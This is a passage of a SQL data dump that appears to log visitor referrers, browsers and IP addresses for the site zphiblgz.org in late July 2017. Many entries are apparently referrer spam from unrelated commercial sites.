nknown','Unknown','Unknown','','74.115.214.135','000',1,0),(7877,'2017-07-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.170.161','000',2,0),(7878,'2017-07-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.125','000',2,0),(7879,'2017-07-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',2,0),(7880,'2017-07-24','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.154.251.162','000',2,0),(7881,'2017-07-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',2,0),(7882,'2017-07-24','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',1,0),(7883,'2017-07-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.15.16.4','000',2,0),(7884,'2017-07-24','http://cheboksary.zrus.org/','MSIE','Windows','5.5','','46.118.112.220','000',2,0),(7885,'2017-07-24','http://zphiblgz.org','Firefox','Windows','14.0.1','','5.9.112.6','000',1,0),(7886,'2017-07-24','https://schock-store.ru/','MSIE','Windows','5.5','','46.118.158.199','000',2,0),(7887,'2017-07-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.76.224.111','000',62,0),(7888,'2017-07-24','http://zphiblgz.org','Firefox','Windows','40.1','','177.13.248.27','000',1,0),(7889,'2017-07-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.56.25','000',2,0),(7890,'2017-07-25','https://letsart.ru/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(7891,'2017-07-25','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','54.89.129.105','000',2,0),(7892,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',2,0),(7893,'2017-07-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','166.70.207.2','000',1,0),(7894,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.75','000',2,0),(7895,'2017-07-25','https://mojaocena.com/','Unknown','Unknown','Unknown','','188.163.72.17','000',2,0),(7896,'2017-07-25','zphiblgz.org','Chrome','Windows','50.0.2661.75','','5.135.143.224','000',2,0),(7897,'2017-07-25','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.88.203','000',2,0),(7898,'2017-07-25','http://03e.info/','Opera','Windows','8.00','','46.118.112.220','000',1,0),(7899,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.87','000',2,0),(7900,'2017-07-25','http://videochat.life/','MSIE','Windows','6.0','','46.119.112.177','000',3,0),(7901,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','67.205.146.164','000',2,0),(7902,'2017-07-25','http://dvervmoskvu.ru/','MSIE','Windows','4.01','','46.118.158.199','000',2,0),(7903,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.102.148.67','000',2,0),(7904,'2017-07-25','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.209','000',1,0),(7905,'2017-07-25','http://hannasolution.ru/','MSIE','Windows','6.0','','46.118.158.199','000',1,0),(7906,'2017-07-25','http://zphiblgz.org','MSIE','Windows','6.0','','92.255.99.128','000',1,0),(7907,'2017-07-25','http://zphiblgz.org','Firefox','Windows','40.1','','108.74.148.238','000',1,0),(7908,'2017-07-25','http://zphiblgz.org','Firefox','Windows','40.1','','39.36.85.193','000',2,0),(7909,'2017-07-25','http://zphiblgz.org','Firefox','Windows','40.0','','188.163.75.28','000',1,0),(7910,'2017-07-25','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.152','000',1,0),(7911,'2017-07-25','http://serdcenebolit.com/','MSIE','Windows','6.0','','46.118.112.220','000',2,0),(7912,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',1,0),(7913,'2017-07-25','http://zphiblgz.org','Firefox','Windows','40.1','','167.0.226.187','000',2,0),(7914,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','92.222.6.12','000',1,0),(7915,'2017-07-25','http://zphiblgz.org','Firefox','Windows','48.0','','103.42.225.180','000',2,0),(7916,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(7917,'2017-07-25','http://zphiblgz.org','Firefox','Windows','40.1','','39.40.117.94','000',1,0),(7918,'2017-07-25','http://zphiblgz.org','Firefox','Windows','40.1','','71.91.133.183','000',2,0),(7919,'2017-07-25','http://ya.ru/?q=http%3A%2F%2Fzphiblgz.org%2F%3Fauthor%3D1','AppleWebKit','iPad','534.46','','195.242.80.124','000',2,0),(7920,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',2,0),(7921,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.76.240','000',1,0),(7922,'2017-07-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.129.246','000',1,0),(7923,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.135.158.101','000',1,0),(7924,'2017-07-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.249.223.74','000',1,0),(7925,'2017-07-25','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(7926,'2017-07-25','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(7927,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.87.185.45','000',2,0),(7928,'2017-07-25','http://zphiblgz.org','Firefox','Windows','40.1','','85.56.198.110','000',1,0),(7929,'2017-07-25','http://zphiblgz.org','Chrome','Macintosh','57.0.2987.98','','104.236.101.136','000',1,0),(7930,'2017-07-25','http://zphiblgz.org','MSIE','Windows','9.0','','138.197.111.84','000',2,0),(7931,'2017-07-25','http://www.z-master.ru/','MSIE','Windows','6.0','','5.248.254.193','000',3,0),(7932,'2017-07-25','https://www.google.com/','Chrome','Windows','59.0.3071.115','','50.255.36.9','000',5,0),(7933,'2017-07-25','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','54.234.232.184','000',4,0),(7934,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.117.118.132','000',2,0),(7935,'2017-07-25','https://mojpreskumanie.com/','MSIE','Windows','7.0b','','188.163.72.17','000',2,0),(7936,'2017-07-25','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.139','000',1,0),(7937,'2017-07-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(7938,'2017-07-25','http://zphiblgz.org','Safari','iPad','10.0','','71.121.204.212','000',1,0),(7939,'2017-07-25','https://www.google.com/','Safari','iPhone','10.0','','100.36.98.55','000',1,0),(7940,'2017-07-25','http://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.216','000',1,0),(7941,'2017-07-25','http://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.150','000',1,0),(7942,'2017-07-25','http://zphiblgz.org','Firefox','Windows','40.1','','5.0.80.213','000',2,0),(7943,'2017-07-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.53','000',1,0),(7944,'2017-07-25','http://zphiblgz.org','Firefox','Windows','40.1','','210.100.171.2','000',1,0),(7945,'2017-07-25','https://www.google.com/','Safari','iPhone','10.0','','73.39.240.124','000',2,0),(7946,'2017-07-25','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','206.41.177.162','000',1,0),(7947,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.213.3.221','000',2,0),(7948,'2017-07-25','http://zphiblgz.org','Firefox','Windows','40.1','','83.31.146.119','000',1,0),(7949,'2017-07-25','http://pavlodar.xkaz.org/','MSIE','Windows','7.0b','','46.118.158.199','000',3,0),(7950,'2017-07-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.165','000',1,0),(7951,'2017-07-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.118','000',3,0),(7952,'2017-07-25','http://stroyplus.ru/','MSIE','Windows','5.0','','188.163.72.17','000',1,0),(7953,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.244','000',2,0),(7954,'2017-07-26','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.130','000',1,0),(7955,'2017-07-26','http://zphiblgz.org','MSIE','Windows','6.0','','92.255.99.128','000',1,0),(7956,'2017-07-26','http://kemerovo.zrus.org/','Unknown','Unknown','Unknown','','46.118.112.220','000',1,0),(7957,'2017-07-26','http://se-welding.ru/','MSIE','Windows','6.0','','46.119.112.177','000',6,0),(7958,'2017-07-26','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(7959,'2017-07-26','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.40.220','000',3,0),(7960,'2017-07-26','http://zphiblgz.org','Chrome','Android','25.0.1364.169','','145.239.74.47','000',17,0),(7961,'2017-07-26','http://smsactivator.ru/','Opera','Windows','7.60','','188.163.72.17','000',2,0),(7962,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.161.56','000',2,0),(7963,'2017-07-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(7964,'2017-07-26','http://zphiblgz.org','Firefox','Windows','40.1','','41.211.164.182','000',2,0),(7965,'2017-07-26','https://dellalimov.com/','MSIE','Windows','5.5','','46.118.112.220','000',2,0),(7966,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',2,0),(7967,'2017-07-26','http://zphiblgz.org/','Firefox','Windows','7.0.1','','66.180.193.219','000',1,0),(7968,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','155.133.82.112','000',2,0),(7969,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','146.185.177.103','000',1,0),(7970,'2017-07-26','http://zphiblgz.org/','Firefox','Windows','7.0.1','','23.129.64.14','000',1,0),(7971,'2017-07-26','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.21','000',1,0),(7972,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.165','000',2,0),(7973,'2017-07-26','https://moje-recenze.cz/','Unknown','Unknown','Unknown','','188.163.72.17','000',1,0),(7974,'2017-07-26','https://www.google.com/','Safari','Macintosh','10.1.2','','71.179.81.192','000',10,0),(7975,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.130.11.147','000',2,0),(7976,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.204','000',2,0),(7977,'2017-07-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(7978,'2017-07-26','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(7979,'2017-07-26','http://zphiblgz.org','Firefox','Windows','40.1','','45.116.190.153','000',2,0),(7980,'2017-07-26','https://buy-meds24.com/','MSIE','Windows','6.0','','178.137.4.41','000',1,0),(7981,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.75','000',1,0),(7982,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.89','000',2,0),(7983,'2017-07-26','http://zphiblgz.org/','Firefox','Windows','7.0.1','','61.230.162.223','000',1,0),(7984,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.194.29.4','000',2,0),(7985,'2017-07-26','https://via-energy-cumpara.com/','MSIE','Windows','6.0','','46.118.158.199','000',1,0),(7986,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.142.15','000',2,0),(7987,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',2,0),(7988,'2017-07-26','http://zphiblgz.org','Firefox','Windows','40.1','','79.177.169.168','000',1,0),(7989,'2017-07-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.76.86','000',2,0),(7990,'2017-07-26','http://podshipniki-nsk.ru/','Unknown','Unknown','Unknown','','178.137.4.41','000',1,0),(7991,'2017-07-26','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','5.248.254.193','000',3,0),(7992,'2017-07-26','http://zphiblgz.org','Firefox','Windows','40.1','','202.57.38.78','000',1,0),(7993,'2017-07-27','https://landscaping.center/','MSIE','Windows','6.0','','46.118.112.220','000',1,0),(7994,'2017-07-27','http://zphiblgz.org','Safari','Linux','534.34','','199.30.228.142','000',2,0),(7995,'2017-07-27','http://zphiblgz.org','Firefox','Windows','40.1','','110.36.218.82','000',2,0),(7996,'2017-07-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.225.33','000',14,0),(7997,'2017-07-27','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.225.33','000',1,0),(7998,'2017-07-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.23.173.249','000',2,0),(7999,'2017-07-27','http://zphiblgz.org','Firefox','Windows','40.1','','177.11.121.120','000',2,0),(8000,'2017-07-27','http://hundejo.com/','Chrome','Linux','37.0.2062.120','','65.19.167.130','000',1,0),(8001,'2017-07-27','https://moetomnenie.com/','MSIE','Windows','6.0','','188.163.72.17','000',4,0),(8002,'2017-07-27','http://zphiblgz.org','Firefox','Windows','40.1','','37.248.153.196','000',2,0),(8003,'2017-07-27','https://www.google.com/','Chrome','Linux','60.0.3112.78','','96.83.83.118','000',17,0),(8004,'2017-07-27','http://www.zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','159.203.94.185','000',2,0),(8005,'2017-07-27','http://zphiblgz.org','Firefox','Windows','29.0','','159.203.94.185','000',1,0),(8006,'2017-07-27','http://zphiblgz.org','Firefox','Windows','28.0','','159.203.94.185','000',3,0),(8007,'2017-07-27','http://zphiblgz.org','Safari','Macintosh','7.0.3','','159.203.94.185','000',1,0),(8008,'2017-07-27','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','159.203.94.185','000',1,0),(8009,'2017-07-27','http://zphiblgz.org','Firefox','Windows','21.0','','159.203.94.185','000',1,0),(8010,'2017-07-27','http://zphiblgz.org','Firefox','Macintosh','29.0','','159.203.94.185','000',2,0),(8011,'2017-07-27','http://zphiblgz.org','Firefox','Windows','40.1','','191.82.212.189','000',2,0),(8012,'2017-07-27','http://zphiblgz.org','Firefox','Windows','40.1','','139.228.98.89','000',2,0),(8013,'2017-07-27','http://chatroulette.online/','MSIE','Windows','6.0','','46.119.112.177','000',2,0),(8014,'2017-07-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.236.141.156','000',2,0),(8015,'2017-07-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.77','000',1,0),(8016,'2017-07-27','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.208','000',1,0),(8017,'2017-07-27','http://zphiblgz.org','Firefox','Windows','40.1','','104.249.224.255','000',1,0),(8018,'2017-07-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(8019,'2017-07-27','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',5,0),(8020,'2017-07-27','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(8021,'2017-07-27','http://zphiblgz.org','Firefox','Windows','40.1','','87.116.188.150','000',2,0),(8022,'2017-07-27','http://zphiblgz.org','Firefox','Windows','40.1','','90.199.197.177','000',1,0),(8023,'2017-07-27','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','9.1.2','','69.121.35.20','000',2,0),(8024,'2017-07-27','https://schock-store.ru/','MSIE','Windows','6.0','','46.118.158.199','000',3,0),(8025,'2017-07-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.15.16.4','000',1,0),(8026,'2017-07-27','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.160.102.168','000',1,0),(8027,'2017-07-27','https://lechenie-gemorroya.com/','Unknown','Unknown','Unknown','','188.163.72.17','000',2,0),(8028,'2017-07-27','https://esopini.com/','MSIE','Windows','5.5','','46.119.112.177','000',5,0),(8029,'2017-07-27','http://yoshkarola.zrus.org/','MSIE','Windows','5.5','','46.118.112.220','000',2,0),(8030,'2017-07-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(8031,'2017-07-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',2,0),(8032,'2017-07-27','http://zphiblgz.org','Firefox','Linux','33.0','','23.95.99.249','000',2,0),(8033,'2017-07-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.98','000',2,0),(8034,'2017-07-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.39.41','000',2,0),(8035,'2017-07-27','http://zphiblgz.org','Firefox','Windows','50.0','','201.18.18.173','000',5,0),(8036,'2017-07-27','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','190.10.14.134','000',1,0),(8037,'2017-07-27','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.68','000',1,0),(8038,'2017-07-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',2,0),(8039,'2017-07-28','http://cool-wedding.net/','MSIE','Windows','5.5','','46.118.112.220','000',4,0),(8040,'2017-07-28','http://zphiblgz.org','Firefox','Windows','40.1','','157.49.14.138','000',2,0),(8041,'2017-07-28','http://zphiblgz.org/','Chrome','Windows','48.0.2564.116','','213.167.200.35','000',1,0),(8042,'2017-07-28','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','67.225.191.22','000',2,0),(8043,'2017-07-28','https://buy-meds24.com/','MSIE','Windows','6.0','','178.137.4.41','000',2,0),(8044,'2017-07-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','189.47.103.108','000',1,0),(8045,'2017-07-28','http://zphiblgz.org','Firefox','Windows','31.0','','113.172.100.200','000',1,0),(8046,'2017-07-28','http://video-chat.love/','MSIE','Windows','6.0','','46.119.112.177','000',2,0),(8047,'2017-07-28','http://zphiblgz.org/','Chrome','Windows','57.5.0467.5195','','60.34.34.68','000',1,0),(8048,'2017-07-28','http://zphiblgz.org/','Chrome','Windows','57.5.0467.5195','','190.77.170.221','000',1,0),(8049,'2017-07-28','http://zphiblgz.org/','Chrome','Windows','57.5.0467.5195','','171.232.38.201','000',1,0),(8050,'2017-07-28','http://life-instyle.com/eda.html','MSIE','Windows','7.0b','','46.118.112.220','000',3,0),(8051,'2017-07-28','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.196','000',1,0),(8052,'2017-07-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.70.226','000',2,0),(8053,'2017-07-28','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','98.102.204.197','000',1,0),(8054,'2017-07-28','http://zphiblgz.org','Poster','Unknown','Unknown','','98.102.204.197','000',1,0),(8055,'2017-07-28','https://ua.tc/','MSIE','Windows','5.5','','178.137.4.41','000',3,0),(8056,'2017-07-28','https://via-energy-order.com/','MSIE','Windows','6.0','','46.118.158.199','000',3,0),(8057,'2017-07-28','http://zphiblgz.org','MSIE','Windows','11.0','','131.118.134.246','000',2,0),(8058,'2017-07-28','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','195.22.127.71','000',1,0),(8059,'2017-07-28','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.96.143','000',2,0),(8060,'2017-07-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.139.161','000',1,0),(8061,'2017-07-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','87.118.116.90','000',1,0),(8062,'2017-07-28','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','82.165.77.104','000',1,0),(8063,'2017-07-28','http://zphiblgz.org','Firefox','Windows','40.1','','37.114.146.73','000',1,0),(8064,'2017-07-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.194','000',1,0),(8065,'2017-07-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','91.223.82.156','000',1,0),(8066,'2017-07-28','http://zphiblgz.org','Firefox','Windows','40.1','','191.102.216.72','000',1,0),(8067,'2017-07-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.8.198','000',1,0),(8068,'2017-07-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.165.223.217','000',1,0),(8069,'2017-07-28','http://zphiblgz.org','Firefox','Windows','40.1','','177.42.97.182','000',2,0),(8070,'2017-07-28','http://zphiblgz.org','Firefox','Windows','40.1','','72.94.12.164','000',1,0),(8071,'2017-07-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.210','000',2,0),(8072,'2017-07-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(8073,'2017-07-28','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',3,0),(8074,'2017-07-28','http://zphiblgz.org','Firefox','Windows','40.1','','49.207.190.136','000',1,0),(8075,'2017-07-28','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.50.71.22','000',2,0),(8076,'2017-07-28','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(8077,'2017-07-28','https://tinyurl.com/y7an4dbr','Opera Next','Windows','43.0.2442.991','','5.101.221.28','000',1,0),(8078,'2017-07-28','http://noobogames.com/viewtopic.php?f=7&t=602338','Firefox','Windows','52.0','','185.36.102.114','000',2,0),(8079,'2017-07-28','https://moetomnenie.com/','MSIE','Windows','6.0','','188.163.72.17','000',2,0),(8080,'2017-07-28','http://zphiblgz.org','Firefox','Windows','40.1','','175.158.201.15','000',1,0),(8081,'2017-07-28','http://zphiblgz.org','Firefox','Windows','40.1','','161.22.100.22','000',1,0),(8082,'2017-07-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.25.103.69','000',2,0),(8083,'2017-07-28','https://www.google.com/','Chrome','Windows','59.0.3071.115','','71.179.98.85','000',3,0),(8084,'2017-07-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.39.2','000',2,0),(8085,'2017-07-28','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','149.210.209.29','000',1,0),(8086,'2017-07-28','https://i-hobot.ru/','Unknown','Unknown','Unknown','','46.118.158.199','000',3,0),(8087,'2017-07-28','http://typer.one/','MSIE','Windows','6.0','','46.211.197.119','000',3,0),(8088,'2017-07-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.212.115','000',2,0),(8089,'2017-07-28','https://www.google.com/','Safari','iPhone','10.0','','69.140.29.93','000',3,0),(8090,'2017-07-28','http://zphiblgz.org','MSIE','Windows','6.0','','92.255.99.128','000',1,0),(8091,'2017-07-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.21.66.6','000',2,0),(8092,'2017-07-29','http://zphiblgz.org','Firefox','Windows','40.1','','49.149.137.158','000',1,0),(8093,'2017-07-29','http://videochat.tv.br/','MSIE','Windows','6.0','','46.119.112.177','000',10,0),(8094,'2017-07-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.28','000',2,0),(8095,'2017-07-29','http://zphiblgz.org','Firefox','Windows','40.1','','105.155.53.202','000',2,0),(8096,'2017-07-29','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','65.60.2.250','000',2,0),(8097,'2017-07-29','http://zphiblgz.org','Windows','Unknown','Unknown','','65.60.2.250','000',1,0),(8098,'2017-07-29','http://zphiblgz.org','Firefox','Windows','40.1','','197.224.147.6','000',1,0),(8099,'2017-07-29','http://zphiblgz.org','Firefox','Windows','40.1','','89.94.228.6','000',1,0),(8100,'2017-07-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(8101,'2017-07-29','http://shymkent.xkaz.org/','MSIE','Windows','6.0','','46.118.158.199','000',1,0),(8102,'2017-07-29','http://zphiblgz.org','curl','Unknown','7.54.1','','5.61.44.59','000',1,0),(8103,'2017-07-29','https://lechenie-gemorroya.com/','MSIE','Windows','6.0','','188.163.72.17','000',4,0),(8104,'2017-07-29','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.62.77','000',1,0),(8105,'2017-07-29','http://zphiblgz.org','G-i-g-a-b-o-t','Unknown','Unknown','','65.132.59.34','000',2,0),(8106,'2017-07-29','http://kaliningrad.zrus.org/','MSIE','Windows','6.0','','46.118.112.220','000',4,0),(8107,'2017-07-29','http://zphiblgz.org','MSIE','Windows','6.0','','46.0.193.127','000',1,0),(8108,'2017-07-29','http://zphiblgz.org','MSIE','Windows','6.0','','92.255.99.128','000',1,0),(8109,'2017-07-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(8110,'2017-07-29','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(8111,'2017-07-29','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','104.154.152.151','000',2,0),(8112,'2017-07-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.210','000',2,0),(8113,'2017-07-29','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','66.112.220.215','000',1,0),(8114,'2017-07-29','http://zphiblgz.org','Firefox','Windows','34.0','','199.19.104.163','000',1,0),(8115,'2017-07-29','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','185.191.204.6','000',1,0),(8116,'2017-07-29','74.220.219.51','Firefox','Windows','33.0','','138.197.202.197','000',1,0),(8117,'2017-07-29','http://zphiblgz.org','Firefox','Windows','33.0','','159.203.42.143','000',1,0),(8118,'2017-07-29','https://letsart.ru/','Opera','Windows','6.01','','178.137.4.41','000',2,0),(8119,'2017-07-29','http://www.anabolics.shop/','MSIE','Windows','4.01','','46.118.112.220','000',2,0),(8120,'2017-07-29','http://zphiblgz.org','Firefox','Windows','20.0','','5.9.112.6','000',1,0),(8121,'2017-07-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.11','000',2,0),(8122,'2017-07-29','http://podshipniki-ntn.ru/','MSIE','Windows','5.5','','178.137.4.41','000',1,0),(8123,'2017-07-30','https://buydissertation.net/','MSIE','Windows','6.0','','46.211.197.119','000',2,0),(8124,'2017-07-30','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','201.18.18.173','000',2,0),(8125,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','192.99.35.167','000',1,0),(8126,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','79.49.79.15','000',2,0),(8127,'2017-07-30','http://zphiblgz.org/','Chrome','Windows','47.0.2526.111','','213.167.200.8','000',1,0),(8128,'2017-07-30','https://educontest.net/','Opera','Windows','8.00','','188.163.72.17','000',2,0),(8129,'2017-07-30','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','164.82.22.2','000',2,0),(8130,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','80.84.49.20','000',1,0),(8131,'2017-07-30','http://zphiblgz.org','Firefox','Linux','3.6.4','','188.165.233.228','000',2,0),(8132,'2017-07-30','https://www.google.com/','Safari','iPhone','10.0','','207.182.78.96','000',1,0),(8133,'2017-07-30','https://via-energy-cumpara.com/','Unknown','Unknown','Unknown','','46.118.158.199','000',3,0),(8134,'2017-07-30','http://hvd-store.com/','Chrome','Linux','37.0.2062.120','','185.38.14.215','000',1,0),(8135,'2017-07-30','https://landscaping.center/','MSIE','Windows','5.0','','46.118.112.220','000',3,0),(8136,'2017-07-30','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','79.170.40.43','000',1,0),(8137,'2017-07-30','http://pk-services.ru/','MSIE','Windows','5.5','','188.163.72.17','000',3,0),(8138,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','119.247.66.76','000',1,0),(8139,'2017-07-30','http://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','163.172.4.153','000',1,0),(8140,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','196.53.59.225','000',2,0),(8141,'2017-07-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.45.131','000',2,0),(8142,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','179.105.126.27','000',1,0),(8143,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','129.122.136.32','000',1,0),(8144,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','59.89.233.47','000',2,0),(8145,'2017-07-30','http://zphiblgz.org','Firefox','Windows','21.0','','5.9.112.6','000',1,0),(8146,'2017-07-30','http://zphiblgz.org','Firefox','Windows','14.0.1','','136.243.17.161','000',1,0),(8147,'2017-07-30','https://www.google.com/','Chrome','Windows','59.0.3071.115','','71.121.201.5','000',1,0),(8148,'2017-07-30','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','66.96.183.53','000',2,0),(8149,'2017-07-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(8150,'2017-07-30','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(8151,'2017-07-30','http://videochat.cafe/','MSIE','Windows','6.0','','46.119.112.177','000',1,0),(8152,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','71.74.143.57','000',2,0),(8153,'2017-07-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(8154,'2017-07-30','http://zphiblgz.org','Firefox','Windows','31.0','','125.209.103.220','000',1,0),(8155,'2017-07-30','https://i-hobot.ru/','MSIE',